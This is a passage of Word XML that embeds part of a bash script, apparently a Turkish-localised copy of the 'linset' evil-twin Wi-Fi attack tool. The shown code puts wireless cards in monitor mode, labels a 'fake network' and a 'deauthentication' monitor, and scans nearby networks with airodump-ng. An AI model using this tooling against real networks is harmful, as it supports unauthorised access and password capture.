    </w:p>
    <w:p w14:paraId="08AF7952" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECDEC32" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>sleep 0.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEB16DA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D8771E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>modprobe "$WIFIDRIVER" &amp;&gt;$linset_output_device 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185EB682" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>sleep 0.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048C4F67" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Bir arayüz seçin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CEE269" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD08E44" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EEA26B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D9A2F0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>select PREWIFI in $INTERFACES; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204C9048" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3447CB63" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41525567" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA3325A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>WIFIMONITOR=$(airmon-ng start $PREWIFI | grep "enabled on" | cut -d " " -f 5 | cut -d ")" -f 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CF69AF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>WIFI_MONITOR=$WIFIMONITOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211620E3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F874C9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA5386F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>WIFIMONITOR2=$(airmon-ng start $PREWIFI2 | grep "enabled on" | cut -d " " -f 5 | cut -d ")" -f 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4372C600" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>WIFI_MONITOR2=$WIFIMONITOR2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2522D960" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F9F684" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4472FA19" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F16A40" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D85D293" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EC0327" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Fiziksel arayüz için bir değişken ayarlayın</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3641E063" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  WIFI=$PREWIFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1849FB0D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  WIFI2=$PREWIFI2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6930E754" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142777E8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Hiçbir şey algılanmazsa kapatın</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492FB275" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DE0EAA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E579A1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo Kablosuz kart bulunamadı. Kapanıyor...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68780893" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>sleep 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEDEF9A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>exitmode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460DDEFB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D301C93" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C501A0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>vk496</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DC493D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF29B81" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="5C445E88" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Tercihin geçerliliğini kontrol eden ve ortamı hazırlayan aracı</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EB69DD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>function vk496 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734910AF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5511FBC4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>conditional_clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF46126" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>CSVDB=dump-01.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133FCB92" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="11714E93" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>rm -rf $DUMP_PATH/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E00929" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CC46BC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>choosescan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C24FCB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>selection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537C131C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F5F662" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4BF9E5F1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Tüm kanalları mı yoksa belirli bir kanalı mı taramak istediğinizi seçin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF72E4F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function choosescan {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B86BC9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0BC4C0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>conditional_clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D87E592" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="117EFA7E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>while true; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5C6F57" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>conditional_clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282845F5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C108A51" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119715C1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo Sahte ağ monitörü $WIFIMONITOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2A35CC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5EC527" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo Ağdan düşürme monitörü $WIFIMONITOR2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BE2E54" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B041917" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "Hangi kanallari tarayalim?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174379A0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "                                       "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129DA2C1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"1)"$yenidenrenklendir" Tüm kanallar             "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44797F5C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"2)"$yenidenrenklendir" Belirli kanallar       "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0417BD93" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "                                       "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD05904" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -n "      #&gt; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF3B329" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>read yn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2D1B64" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39808998" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>case $yn in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132B63E3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>1 ) Scan ; break ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A3C2E0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">2 ) Scanchan ; break ;;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F77C2D2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>* ) echo "Bilinmeyen seçenek. Tekrar seç"; conditional_clear ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1079DC05" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  esac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFA5B3F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788B58E6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DE67AB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="333BC531" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># 2. seçeneği seçtiyseniz taranacak kanalları seçin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1708B9E0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function Scanchan {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CF8E62" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69960E6E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>conditional_clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB48115" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C8C46A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="782402C7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  echo "                                       "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188B7844" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  echo "      Selecciona Canal de busqueda     "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399198CD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  echo "                                       "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219FD0FC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  echo -e "     Un solo canal     "$yesil"6"$yenidenrenklendir"               "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B21053A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  echo -e "     rango de canales  "$yesil"1-5"$yenidenrenklendir"             "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD245F5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  echo -e "     Multiples canales "$yesil"1,2,5-7,11"$yenidenrenklendir"      "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D29135" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  echo "                                       "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1989DA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -n "      #&gt; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CA43BD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>read channel_number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9597CD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>set -- ${channel_number}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BED941F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>conditional_clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645864D1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2093FF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>rm -rf $DUMP_PATH/dump*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DA70F5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>xterm $HOLD -title "Escaneando Objetivos en el canal --&gt;  $channel_number" $TOPLEFTBIG -bg "#000000" -fg "#FFFFFF" -e airodump-ng -w $DUMP_PATH/dump --channel "$channel_number" -a $WIFI_MONITOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012C403F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A9712E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># Tüm ağı tarar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14679F59" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function Scan {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6658C9B2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="773EA83C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>conditional_clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C903FA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>xterm $HOLD -title "Hedefler Taranıyor ..." $TOPLEFTBIG -bg "#FFFFFF" -fg "#000000" -e airodump-ng -w $DUMP_PATH/dump -a $WIFI_MONITOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAA6329" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AB17D3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1CBDE447" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Tüm tarananlardan bir ağ seçin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEB3D8D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function selection {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA5282F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D03645F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>conditional_clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462E6D6C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
